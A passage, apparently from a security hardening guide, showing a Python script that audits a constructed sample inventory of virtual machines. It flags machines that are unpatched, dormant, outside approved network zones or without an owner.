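The records below are constructed sample data (hypothetical names and dates),
not output from any real hypervisor or asset-management system.
"""
from datetime import date

# Network zones named in the guidance (public, storage, management).
APPROVED_ZONES = {"public", "storage", "management"}
MAX_PATCH_AGE_DAYS = 30   # assumed threshold: patched within the last 30 days
MAX_DORMANT_DAYS = 90     # assumed threshold: stopped VM unseen for 90+ days

# Constructed sample inventory.
INVENTORY = [
    {"name": "web-01", "zone": "public", "state": "running",
     "last_patched": "2025-11-10", "last_seen": "2025-11-25", "owner": "webteam"},
    {"name": "legacy-app", "zone": "public", "state": "running",
     "last_patched": "2025-03-02", "last_seen": "2025-11-25", "owner": ""},
    {"name": "old-test", "zone": "lab", "state": "stopped",
     "last_patched": "2025-01-15", "last_seen": "2025-06-01", "owner": "dev"},
    {"name": "nas-01", "zone": "storage", "state": "running",
     "last_patched": "2025-11-20", "last_seen": "2025-11-25", "owner": "infra"},
]


def audit_inventory(vms, today_iso):
    """Return {vm_name: [issue, ...]} for every VM with at least one finding."""
    today = date.fromisoformat(today_iso)
    findings = {}
    for vm in vms:
        issues = []
        patch_age = (today - date.fromisoformat(vm["last_patched"])).days
        unseen_for = (today - date.fromisoformat(vm["last_seen"])).days
        if patch_age > MAX_PATCH_AGE_DAYS:          # obsolete/unpatched server
            issues.append("unpatched")
        if vm["state"] != "running" and unseen_for > MAX_DORMANT_DAYS:
            issues.append("dormant")                 # offline VM, still an entry point
        if vm["zone"] not in APPROVED_ZONES:         # not in a defined network zone
            issues.append("unapproved-zone")
        if not vm["owner"]:                          # nobody accountable for it
            issues.append("no-owner")
        if issues:
            findings[vm["name"]] = issues
    return findings


if __name__ == "__main__":
    for name, issues in audit_inventory(INVENTORY, "2025-11-26").items():
        print(f"{name}: {', '.join(issues)}")
```

Run periodically against a real inventory export, the same checks give the "regularly audit and remove unused VMs" action a concrete, repeatable form.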
